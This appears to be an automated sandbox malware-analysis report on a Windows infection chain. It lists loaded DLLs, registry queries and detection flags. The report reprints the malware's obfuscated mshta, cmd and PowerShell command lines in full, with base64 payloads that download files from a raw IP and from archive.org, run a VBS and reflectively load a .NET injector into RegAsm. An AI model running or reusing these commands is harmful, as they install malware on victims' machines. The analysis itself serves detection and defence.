                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: Binary string: TenantRestrictions\PayloaddConnRouteHelper.dllrfrvbpim.pdb source: powershell.exe, 00000003.00000002.2175384475.0000000007B40000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: $]q8C:\Users\user\AppData\Local\Temp\rfrvbpim\rfrvbpim.pdb source: powershell.exe, 00000003.00000002.2169309335.000000000593F000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: System.Data.Linq.pdb source: powershell.exe, 00000009.00000002.2263876284.00000000060CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2285326980.0000000008730000.00000004.08000000.00040000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      Found suspicious powershell code related to unpacking or dynamic code loading
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $Codigo = 'KCdnJysnWUZ1cmwgPSAnKydDJysnTkEnKydodHQnKydwcycrJzovJysnL2lhNjAwMTAwJysnLnVzLicrJ2FyY2hpdmUuJysnb3JnLzI0LycrJ2l0JysnZW1zLycrJ2RldGEnKydoLW4nKydvJysndGUtJysndi9EZXRhaE4nKydvdGVWJysnLicrJ3R4dENOQScrJztnWUZiYXNlJysnNjRDb250ZW50ICcrJz0gKE5lJysndycrJy1PYmonKydlYycrJ3QnKycgU3lzdCcrJ2VtLk4nKydldCcrJy5XZWJDbGllbicrJ3QpJysnLkRvd25sb2FkJysnU3RyaW5nKGdZRicrJ3VybCknKyc7ZycrJ1lGYmluYXInKyd5JysnQ29udGVudCA9ICcrJ1tTeXN0ZW0nKycuQ29uJysndmVydCcrJ106OkZyb21CYXNlNjRTJysndCcrJ3JpbmcnKycoZ1knKydGYicrJ2FzZScrJzY0Q29udCcrJ2UnKyduJysndCk7ZycrJ1lGYScrJ3MnKydzJysnZW1ibCcrJ3kgPSBbUmVmbCcrJ2VjJysndGknKydvbi5BJysnc3MnKydlbWJseScrJ10nKyc6OicrJ0xvYWQoZ1lGYmknKyduYXJ5JysnQ29uJysndGVudCcrJyk7Z1lGdHlwZSA9IGdZRmEnKydzc2VtJysnYmx5LkcnKydldFR5cGUnKycoQ05BUnVuUEUnKycuSCcrJ29tJysnZUNOJysnQSk7Z1lGJysnbWUnKyd0aCcrJ29kID0gZ1lGdCcrJ3lwZS5HZXRNZXRob2QoQ05BVicrJ0FJQ05BKTtnWUZtZXRob2QuSW52b2tlKGdZRicrJ251bGwsIFtvYmplYycrJ3RbJysnXV1AKENOQXR4dC4nKydBWlBQSEMvNTQnKyczLzg0MS4nKycyMy44NjEnKycuJysnNDAxLy86cHR0aENOQSAsIENOQWRlc2F0aXZhZG9DTkEgLCBDTkFkZXNhdGl2YScrJ2RvQ04nKydBICwnKycgQ04nKydBJysnZGVzYXRpdicrJ2EnKydkb0NOQSxDJysnTkFSZScrJ2dBc21DTkEnKycsQycrJ05BQ05BJysnKSknKS5yRVBsYUNFKCdDTkEnLFtzdHJJbmddW0NIYXJdMzkpLnJFUGxhQ0UoJ2dZRicsJyQnKSB8IC4gKCAkZU5WOkNPbXNwRWNbNCwyNiwyNV0tak9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?
                      Obfuscated command line found
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('g'+'YFurl = '+'C'+'NA'+'htt'+'ps'+':/'+'/ia600100'+'.us.'+'archive.'+'org/24/'+'it'+'ems/'+'deta'+'h-n'+'o'+'te-'+'v/DetahN'+'oteV'+'.'+'txtCNA'+';gYFbase'+'64Content '+'= (Ne'+'w'+'-Obj'+'ec'+'t'+' Syst'+'em.N'+'et'+'.WebClien'+'t)'+'.Download'+'String(gYF'+'url)'+';g'+'YFbinar'+'y'+'Content = '+'[System'+'.Con'+'vert'+']::FromBase64S'+'t'+'ring'+'(gY'+'Fb'+'ase'+'64Cont'+'e'+'n'+'t);g'+'YFa'+'s'+'s'+'embl'+'y = [Refl'+'ec'+'ti'+'on.A'+'ss'+'embly'+']'+'::'+'Load(gYFbi'+'nary'+'Con'+'tent'+');gYFtype = gYFa'+'ssem'+'bly.G'+'etType'+'(CNARunPE'+'.H'+'om'+'eCN'+'A);gYF'+'me'+'th'+'od = gYFt'+'ype.GetMethod(CNAV'+'AICNA);gYFmethod.Invoke(gYF'+'null, [objec'+'t['+']]@(CNAtxt.'+'AZPPHC/54'+'3/841.'+'23.861'+'.'+'401//:ptthCNA , CNAdesativadoCNA , CNAdesativa'+'doCN'+'A ,'+' CN'+'A'+'desativ'+'a'+'doCNA,C'+'NARe'+'gAsmCNA'+',C'+'NACNA'+'))').rEPlaCE('CNA',[strIng][CHar]39).rEPlaCE('gYF','$') | . ( $eNV:COmspEc[4,26,25]-jOiN'')"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('g'+'YFurl = '+'C'+'NA'+'htt'+'ps'+':/'+'/ia600100'+'.us.'+'archive.'+'org/24/'+'it'+'ems/'+'deta'+'h-n'+'o'+'te-'+'v/DetahN'+'oteV'+'.'+'txtCNA'+';gYFbase'+'64Content '+'= (Ne'+'w'+'-Obj'+'ec'+'t'+' Syst'+'em.N'+'et'+'.WebClien'+'t)'+'.Download'+'String(gYF'+'url)'+';g'+'YFbinar'+'y'+'Content = '+'[System'+'.Con'+'vert'+']::FromBase64S'+'t'+'ring'+'(gY'+'Fb'+'ase'+'64Cont'+'e'+'n'+'t);g'+'YFa'+'s'+'s'+'embl'+'y = [Refl'+'ec'+'ti'+'on.A'+'ss'+'embly'+']'+'::'+'Load(gYFbi'+'nary'+'Con'+'tent'+');gYFtype = gYFa'+'ssem'+'bly.G'+'etType'+'(CNARunPE'+'.H'+'om'+'eCN'+'A);gYF'+'me'+'th'+'od = gYFt'+'ype.GetMethod(CNAV'+'AICNA);gYFmethod.Invoke(gYF'+'null, [objec'+'t['+']]@(CNAtxt.'+'AZPPHC/54'+'3/841.'+'23.861'+'.'+'401//:ptthCNA , CNAdesativadoCNA , CNAdesativa'+'doCN'+'A ,'+' CN'+'A'+'desativ'+'a'+'doCNA,C'+'NARe'+'gAsmCNA'+',C'+'NACNA'+'))').rEPlaCE('CNA',[strIng][CHar]39).rEPlaCE('gYF','$') | . ( $eNV:COmspEc[4,26,25]-jOiN'')"Jump to behavior
                      PowerShell case anomaly found
                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoWerSHELl -Ex bYPass -nOp -w 1 -C DEVIcEcRedeNTIaldeplOymeNt.eXe ; IEX($(ieX('[SYstem.TEXt.eNcODiNG]'+[char]0X3a+[CHAR]58+'uTf8.GETSTRiNG([SySTEm.COnveRt]'+[cHAR]0X3A+[CHAR]58+'fRoMbasE64StrinG('+[ChAr]0X22+'JDBGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlckRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhzd0Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkNBeW1xSFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0RyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMUixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBncHlSc3VoKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAia28iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzUGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpncmZ6QmtEbGllICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQwRjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNC4xNjguMzIuMTQ4LzM0NS9uaWNlbWVldGluZ3NvZnBpY3R1cmVjbGVhcnRoaW5nc3RvYmUudElGIiwiJGVudjpBUFBEQVRBXG5pY2VtZWV0aW5nc29mcGljdHVyZWNsZWFydGhpbmdzdG9iLlZicyIsMCwwKTtzdGFyVC1zTGVFcCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcbmljZW1lZXRpbmdzb2ZwaWN0dXJlY2xlYXJ0aGluZ3N0b2IuVmJzIg=='+[CHAr]0x22+'))')))"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWerSHELl -Ex bYPass -nOp -w 1 -C DEVIcEcRedeNTIaldeplOymeNt.eXe ; IEX($(ieX('[SYstem.TEXt.eNcODiNG]'+[char]0X3a+[CHAR]58+'uTf8.GETSTRiNG([SySTEm.COnveRt]'+[cHAR]0X3A+[CHAR]58+'fRoMbasE64StrinG('+[ChAr]0X22+'JDBGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlckRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhzd0Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkNBeW1xSFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0RyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMUixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBncHlSc3VoKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAia28iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzUGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpncmZ6QmtEbGllICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQwRjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNC4xNjguMzIuMTQ4LzM0NS9uaWNlbWVldGluZ3NvZnBpY3R1cmVjbGVhcnRoaW5nc3RvYmUudElGIiwiJGVudjpBUFBEQVRBXG5pY2VtZWV0aW5nc29mcGljdHVyZWNsZWFydGhpbmdzdG9iLlZicyIsMCwwKTtzdGFyVC1zTGVFcCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcbmljZW1lZXRpbmdzb2ZwaWN0dXJlY2xlYXJ0aGluZ3N0b2IuVmJzIg=='+[CHAr]0x22+'))')))"
                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoWerSHELl -Ex bYPass -nOp -w 1 -C DEVIcEcRedeNTIaldeplOymeNt.eXe ; IEX($(ieX('[SYstem.TEXt.eNcODiNG]'+[char]0X3a+[CHAR]58+'uTf8.GETSTRiNG([SySTEm.COnveRt]'+[cHAR]0X3A+[CHAR]58+'fRoMbasE64StrinG('+[ChAr]0X22+'JDBGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlckRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhzd0Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkNBeW1xSFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0RyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMUixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBncHlSc3VoKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAia28iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzUGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpncmZ6QmtEbGllICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQwRjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNC4xNjguMzIuMTQ4LzM0NS9uaWNlbWVldGluZ3NvZnBpY3R1cmVjbGVhcnRoaW5nc3RvYmUudElGIiwiJGVudjpBUFBEQVRBXG5pY2VtZWV0aW5nc29mcGljdHVyZWNsZWFydGhpbmdzdG9iLlZicyIsMCwwKTtzdGFyVC1zTGVFcCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcbmljZW1lZXRpbmdzb2ZwaWN0dXJlY2xlYXJ0aGluZ3N0b2IuVmJzIg=='+[CHAr]0x22+'))')))"Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWerSHELl -Ex bYPass -nOp -w 1 -C DEVIcEcRedeNTIaldeplOymeNt.eXe ; IEX($(ieX('[SYstem.TEXt.eNcODiNG]'+[char]0X3a+[CHAR]58+'uTf8.GETSTRiNG([SySTEm.COnveRt]'+[cHAR]0X3A+[CHAR]58+'fRoMbasE64StrinG('+[ChAr]0X22+'JDBGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlckRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhzd0Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkNBeW1xSFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0RyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMUixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBncHlSc3VoKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAia28iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzUGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpncmZ6QmtEbGllICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQwRjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNC4xNjguMzIuMTQ4LzM0NS9uaWNlbWVldGluZ3NvZnBpY3R1cmVjbGVhcnRoaW5nc3RvYmUudElGIiwiJGVudjpBUFBEQVRBXG5pY2VtZWV0aW5nc29mcGljdHVyZWNsZWFydGhpbmdzdG9iLlZicyIsMCwwKTtzdGFyVC1zTGVFcCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcbmljZW1lZXRpbmdzb2ZwaWN0dXJlY2xlYXJ0aGluZ3N0b2IuVmJzIg=='+[CHAr]0x22+'))')))"Jump to behavior
                      Suspicious command line found
                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C PoWerSHELl -Ex bYPass -nOp -w 1 -C DEVIcEcRedeNTIaldeplOymeNt.eXe ; IEX($(ieX('[SYstem.TEXt.eNcODiNG]'+[char]0X3a+[CHAR]58+'uTf8.GETSTRiNG([SySTEm.COnveRt]'+[cHAR]0X3A+[CHAR]58+'fRoMbasE64StrinG('+[ChAr]0X22+'JDBGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlckRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhzd0Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkNBeW1xSFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0RyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMUixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBncHlSc3VoKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAia28iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzUGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpncmZ6QmtEbGllICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQwRjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNC4xNjguMzIuMTQ4LzM0NS9uaWNlbWVldGluZ3NvZnBpY3R1cmVjbGVhcnRoaW5nc3RvYmUudElGIiwiJGVudjpBUFBEQVRBXG5pY2VtZWV0aW5nc29mcGljdHVyZWNsZWFydGhpbmdzdG9iLlZicyIsMCwwKTtzdGFyVC1zTGVFcCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcbmljZW1lZXRpbmdzb2ZwaWN0dXJlY2xlYXJ0aGluZ3N0b2IuVmJzIg=='+[CHAr]0x22+'))')))"
                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C PoWerSHELl -Ex bYPass -nOp -w 1 -C DEVIcEcRedeNTIaldeplOymeNt.eXe ; IEX($(ieX('[SYstem.TEXt.eNcODiNG]'+[char]0X3a+[CHAR]58+'uTf8.GETSTRiNG([SySTEm.COnveRt]'+[cHAR]0X3A+[CHAR]58+'fRoMbasE64StrinG('+[ChAr]0X22+'JDBGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlckRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhzd0Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkNBeW1xSFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0RyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMUixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBncHlSc3VoKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAia28iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzUGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpncmZ6QmtEbGllICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQwRjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNC4xNjguMzIuMTQ4LzM0NS9uaWNlbWVldGluZ3NvZnBpY3R1cmVjbGVhcnRoaW5nc3RvYmUudElGIiwiJGVudjpBUFBEQVRBXG5pY2VtZWV0aW5nc29mcGljdHVyZWNsZWFydGhpbmdzdG9iLlZicyIsMCwwKTtzdGFyVC1zTGVFcCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcbmljZW1lZXRpbmdzb2ZwaWN0dXJlY2xlYXJ0aGluZ3N0b2IuVmJzIg=='+[CHAr]0x22+'))')))"Jump to behavior
                      Suspicious powershell command line found
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWerSHELl -Ex bYPass -nOp -w 1 -C DEVIcEcRedeNTIaldeplOymeNt.eXe ; IEX($(ieX('[SYstem.TEXt.eNcODiNG]'+[char]0X3a+[CHAR]58+'uTf8.GETSTRiNG([SySTEm.COnveRt]'+[cHAR]0X3A+[CHAR]58+'fRoMbasE64StrinG('+[ChAr]0X22+'JDBGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlckRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhzd0Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkNBeW1xSFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0RyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMUixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBncHlSc3VoKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAia28iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzUGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpncmZ6QmtEbGllICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQwRjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNC4xNjguMzIuMTQ4LzM0NS9uaWNlbWVldGluZ3NvZnBpY3R1cmVjbGVhcnRoaW5nc3RvYmUudElGIiwiJGVudjpBUFBEQVRBXG5pY2VtZWV0aW5nc29mcGljdHVyZWNsZWFydGhpbmdzdG9iLlZicyIsMCwwKTtzdGFyVC1zTGVFcCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcbmljZW1lZXRpbmdzb2ZwaWN0dXJlY2xlYXJ0aGluZ3N0b2IuVmJzIg=='+[CHAr]0x22+'))')))"
